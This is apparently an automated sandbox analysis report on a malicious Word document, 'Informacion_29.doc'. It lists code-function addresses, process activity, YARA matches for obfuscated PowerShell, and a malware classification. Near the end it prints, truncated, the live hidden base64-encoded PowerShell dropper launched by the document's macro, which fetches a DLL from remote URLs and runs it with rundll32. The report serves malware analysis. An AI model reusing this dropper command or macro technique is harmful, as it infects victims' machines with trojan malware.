Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_1001C28B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_1003B353
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_1003B473
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_1001C4BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_1001C71A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_1001B773
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_1001C986
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_1001B9A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_100079E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_1001CBE3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_1001BBE6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_1001BE18
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_1002FE2A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_1001CE40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041BB41F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041BF536
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041B568E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041B8736
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041BC0C6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041C42DA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041C02C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041C73AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041B2C63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041BEE78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041C3895
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041C4B41
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041B7B63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041C340A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041BF444
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041B153C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041C9586
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041B96CD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041C26F5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041BB75F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041B6754
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041C1773
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041BC769
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041C878F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041B17AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041BD7EB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041C67E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041BE05A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041B80BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041B60B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041CA0AF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041C20C5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041C511B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041BB112
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041C61B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041C71EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041C31E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041B1280
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041B62A3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041C12E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041C2349
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041BE377
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041B839D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041C63C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041B1CFA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041C8D1C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041C5D1D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041C7D03
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041C0D33
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041B6D9F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041C6DB9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041C7F1F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041C0F0C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041C8F49
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041B8F78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041B9FDC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041C3FE7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041C687F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041C889D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041B48BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041B88E5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041B7998
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041BF98C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041B69A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041C7A0F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041B2A30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041B9A37
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041B4A35
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041BEA4C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041C5A61
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041C8ADC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041C2B16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041BBB3A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041C9B45
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041B5B79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041C0B68
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_041C1BDF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_03444B41
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_03442349
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0343C769
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0343E377
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_03435B79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_03447D03
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_03442B16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_03448D1C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_03438736
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0343F536
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0343153C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_03439FDC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_034431E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0343F98C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_034473AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_03432C63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_03445A61
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0343B41F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_034402C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_03431CFA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_034360B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_03449B45
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_03448F49
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_03436754
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0343B75F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_03437B63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_03440B68
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_03441773
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_03438F78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_03440F0C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0343B112
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_03445D1D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_03447F1F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0344511B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_03440D33
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0343BB3A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_034463C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_03441BDF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_03443FE7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0343D7EB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_034471EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_034467E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_03449586
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0344878F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_03437998
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_03436D9F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0343839D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_034369A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_034317AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_034461B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_03446DB9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0343F444
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0343EA4C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0343E05A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0343EE78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0344687F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_03447A0F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0344340A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_03432A30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_03439A37
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_03434A35
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_034420C5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0343C0C6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_034396CD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_03448ADC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_034442DA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_034388E5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_034412E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_034426F5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_03431280
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0343568E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_03443895
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0344889D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_034362A3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0344A0AF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_034380BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_034348BD

Source: Informacion_29.doc	OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation	OLE, VBA macro: Module Ouz_y28f7ehnqn, Function Document_open

Source: Informacion_29.doc

OLE indicator, VBA macros: true

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 100040F0 appears 46 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 10029D17 appears 32 times

Source: C:\Windows\System32\svchost.exe	Section loaded: xboxlivetitleid.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cdpsgshims.dll

Source: 00000004.00000002.289454945.0000018A154BB000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000003.278200486.0000018A2C3D3000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000002.280486298.0000018A13D20000.00000004.00000040.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000002.290625263.0000018A2C1D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000002.289399769.0000018A15456000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000002.280124224.0000018A123D5000.00000004.00000040.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000002.289286993.0000018A153A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000002.290618766.0000018A2C1C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000002.289171312.0000018A152BB000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000002.289463456.0000018A154C9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000002.289073167.0000018A15205000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =

Source: Q27V.dll.4.dr

Static PE information: Section: .rsrc ZLIB complexity 0.995798093463

Source: classification engine

Classification label: mal100.troj.evad.winDOC@24/17@5/9

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 14_2_03431C88 CreateToolhelp32Snapshot,

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7012:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:7084:120:WilError_01

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\{335C5621-0832-4843-9FBC-E9AB4A592B32} - OProcSessId.dat

Jump to behavior

Source: Informacion_29.doc

OLE indicator, Word Document stream: true

Source: Informacion_29.doc	OLE document summary: title field not present or empty
Source: Informacion_29.doc	OLE document summary: edited time not present or 0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\msg.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: unknown

Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nsghoht\Gbh5r9o\Q27V.dll,Control_RunDLL

Source: Informacion_29.doc	Virustotal: Detection: 62%
Source: Informacion_29.doc	ReversingLabs: Detection: 79%

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IAAgACQAVQA2ADMANQAxAD0AWwBUAFkAcABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsANAB9AHsAMwB9AHsANQB9ACIAIAAtAEYAIAAnAHkAUwBUAEUAbQAuAGkAJwAsACcATwAuAGQAaQAnACwAJwBzACcALAAnAEUAYwBUAE8AJwAsACcAUgAnACwAJwBSAFkAJwApACAAIAA7ACQATwBMAFYAIAA9ACAAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAOAB9AHsAMwB9AHsANgB9AHsANQB9AHsAMgB9AHsANAB9ACIAIAAtAEYAJwBzAFkAJwAsACcAVABFAG0ALgBOAEUAJwAsACcAbgB0AG0AQQBOACcALAAnAHYAJwAsACcAQQBHAGUAUgAnACwAJwBJACcALAAnAGkAQwBlAFAATwAnACwAJwBzACcALAAnAFQALgBzAGUAUgAnACkAIAAgADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAaQAnACsAKAAnAGwAZQAnACsAJwBuACcAKQArACcAdAAnACsAKAAnAGwAeQAnACsAJwBDACcAKQArACgAJwBvAG4AdABpACcAKwAnAG4AJwArACcAdQBlACcAKQApADsAJABZAHQAZABfAHAAcABiAD0AJABIADQAXwBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABRADAAMQBRADsAJABFADEANQBOAD0AKAAoACcATwAnACsAJwAxAF8AJwApACsAJwBWACcAKQA7ACAAIAAoACAAZwBlAFQALQBWAGEAUgBpAGEAYgBsAGUAIAB1ADYAMwA1ADEAIAAtAFYAYQBMAFUARQBvAE4ATAB5ACAAKQA6ADoAIgBjAFIARQBgAEEAVABlAGQASQByAGAAZQBDAGAAVABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AE4AJwArACgAJwBzAGcAaAAnACsAJwBvACcAKQArACcAaAB0AHsAMAB9ACcAKwAnAEcAJwArACcAYgAnACsAKAAnAGgANQByACcAKwAnADkAbwAnACkAKwAnAHsAMAB9ACcAKQAgAC0AZgAgACAAWwBjAEgAYQBSAF0AOQAyACkAKQA7ACQATgA5ADUAVwA9ACgAKAAnAFMAJwArACcAMgA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgACAATABzACAAIAB2AEEAcgBJAEEAQgBsAGUAOgBvAGwAVgApAC4AVgBBAGwAVQBFADoAOgAiAFMARQBDAFUAcgBgAEkAVABZAGAAUAByAE8AVABPAGAAYwBvAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAxACcAKwAnADIAJwApACkAOwAkAEsAXwAyAEwAPQAoACcAQgA2ACcAKwAnADcATwAnACkAOwAkAEIAZQB4AG8AMgA4AHQAIAA9ACAAKAAnAFEAMgAnACsAJwA3AFYAJwApADsAJABNADYAOQBOAD0AKAAoACcAVQAnACsAJwA3ADIAJwApACsAJwBBACcAKQA7ACQAWgBjADcAbgA3AHkAXwA9ACQASABPAE0ARQArACgAKAAnAHsAJwArACcAMAAnACsAJwB9ACcAKwAoACcATgAnACsAJwBzAGcAJwApACsAJwBoAG8AaAB0AHsAMAB9ACcAKwAnAEcAJwArACgAJwBiACcAKwAnAGgANQByACcAKQArACcAOQBvAHsAMAB9ACcAKQAgAC0ARgBbAEMASABBAFIAXQA5ADIAKQArACQAQgBlAHgAbwAyADgAdAArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBfADEAVwA9ACgAKAAnAE0AJwArACcAMwA0ACcAKQArACcAWQAnACkAOwAkAEkAbABlAF8AdgBhAGEAPQAoACcAXQAnACsAKAAnAGIAMgAnACsAJwBbACcAKwAnAHMAOgAvAC8AdwAnACsAJwBoAGUAZQBsACcAKQArACcAYwBvACcAKwAnAG0AbwAnACsAJwB2AGkAJwArACgAJwBuACcAKwAnAGcALgBjAG8AJwArACcAbQAvAHAAJwApACsAJwAvAFIAJwArACcAdQAnACsAJwBNACcAKwAoACcAZQBSAFAAJwArACcAYQAnACkAKwAnAC8AQAAnACsAKAAnAF0AJwArACcAYgAyAFsAcwA6AC8AJwApACsAKAAnAC8AJwArACcAMAAwACcAKQArACcAegAnACsAKAAnAHkAJwArACcAawB1ACcAKQArACcALgAnACsAJwBjAG8AJwArACgAJwBtAC8AdwAnACsAJwBwACcAKwAnAC0AYQBkAG0AaQBuAC8AJwArACcAZQAnACkAKwAoACcAWQB1ADEAJwArACcAUQAvACcAKQArACcAQABdACcAKwAnAGIAJwArACgAJwAyAFsAJwArACcAcwA6AC8ALwBrACcAKQArACgAJwBlACcAKwAnAHQAbwByAGUAJwApACsAKAAnAHMAZQAnACsAJwB0AG0AJwApACsAKAAnAGUAJwArACcALgBjAG8AbQAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAoACcALQAnACsAJwBjAG8AbgB0ACcAKQArACgAJwBlACcAKwAnAG4AdAAvAHAAbQBKACcAKQArACcALwAnACsAKAAnAEAAJwArACcAXQBiACcAKQArACcAMgAnACsA
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAVQA2ADMANQAxAD0AWwBUAFkAcABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsANAB9AHsAMwB9AHsANQB9ACIAIAAtAEYAIAAnAHkAUwBUAEUAbQAuAGkAJwAsACcATwAuAGQAaQAnACwAJwBzACcALAAnAEUAYwBUAE8AJwAsACcAUgAnACwAJwBSAFkAJwApACAAIAA7ACQATwBMAFYAIAA9ACAAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAOAB9AHsAMwB9AHsANgB9AHsANQB9AHsAMgB9AHsANAB9ACIAIAAtAEYAJwBzAFkAJwAsACcAVABFAG0ALgBOAEUAJwAsACcAbgB0AG0AQQBOACcALAAnAHYAJwAsACcAQQBHAGUAUgAnACwAJwBJACcALAAnAGkAQwBlAFAATwAnACwAJwBzACcALAAnAFQALgBzAGUAUgAnACkAIAAgADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAaQAnACsAKAAnAGwAZQAnACsAJwBuACcAKQArACcAdAAnACsAKAAnAGwAeQAnACsAJwBDACcAKQArACgAJwBvAG4AdABpACcAKwAnAG4AJwArACcAdQBlACcAKQApADsAJABZAHQAZABfAHAAcABiAD0AJABIADQAXwBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABRADAAMQBRADsAJABFADEANQBOAD0AKAAoACcATwAnACsAJwAxAF8AJwApACsAJwBWACcAKQA7ACAAIAAoACAAZwBlAFQALQBWAGEAUgBpAGEAYgBsAGUAIAB1ADYAMwA1ADEAIAAtAFYAYQBMAFUARQBvAE4ATAB5ACAAKQA6ADoAIgBjAFIARQBgAEEAVABlAGQASQByAGAAZQBDAGAAVABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AE4AJwArACgAJwBzAGcAaAAnACsAJwBvACcAKQArACcAaAB0AHsAMAB9ACcAKwAnAEcAJwArACcAYgAnACsAKAAnAGgANQByACcAKwAnADkAbwAnACkAKwAnAHsAMAB9ACcAKQAgAC0AZgAgACAAWwBjAEgAYQBSAF0AOQAyACkAKQA7ACQATgA5ADUAVwA9ACgAKAAnAFMAJwArACcAMgA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgACAATABzACAAIAB2AEEAcgBJAEEAQgBsAGUAOgBvAGwAVgApAC4AVgBBAGwAVQBFADoAOgAiAFMARQBDAFUAcgBgAEkAVABZAGAAUAByAE8AVABPAGAAYwBvAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAxACcAKwAnADIAJwApACkAOwAkAEsAXwAyAEwAPQAoACcAQgA2ACcAKwAnADcATwAnACkAOwAkAEIAZQB4AG8AMgA4AHQAIAA9ACAAKAAnAFEAMgAnACsAJwA3AFYAJwApADsAJABNADYAOQBOAD0AKAAoACcAVQAnACsAJwA3ADIAJwApACsAJwBBACcAKQA7ACQAWgBjADcAbgA3AHkAXwA9ACQASABPAE0ARQArACgAKAAnAHsAJwArACcAMAAnACsAJwB9ACcAKwAoACcATgAnACsAJwBzAGcAJwApACsAJwBoAG8AaAB0AHsAMAB9ACcAKwAnAEcAJwArACgAJwBiACcAKwAnAGgANQByACcAKQArACcAOQBvAHsAMAB9ACcAKQAgAC0ARgBbAEMASABBAFIAXQA5ADIAKQArACQAQgBlAHgAbwAyADgAdAArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBfADEAVwA9ACgAKAAnAE0AJwArACcAMwA0ACcAKQArACcAWQAnACkAOwAkAEkAbABlAF8AdgBhAGEAPQAoACcAXQAnACsAKAAnAGIAMgAnACsAJwBbACcAKwAnAHMAOgAvAC8AdwAnACsAJwBoAGUAZQBsACcAKQArACcAYwBvACcAKwAnAG0AbwAnACsAJwB2AGkAJwArACgAJwBuACcAKwAnAGcALgBjAG8AJwArACcAbQAvAHAAJwApACsAJwAvAFIAJwArACcAdQAnACsAJwBNACcAKwAoACcAZQBSAFAAJwArACcAYQAnACkAKwAnAC8AQAAnACsAKAAnAF0AJwArACcAYgAyAFsAcwA6AC8AJwApACsAKAAnAC8AJwArACcAMAAwACcAKQArACcAegAnACsAKAAnAHkAJwArACcAawB1ACcAKQArACcALgA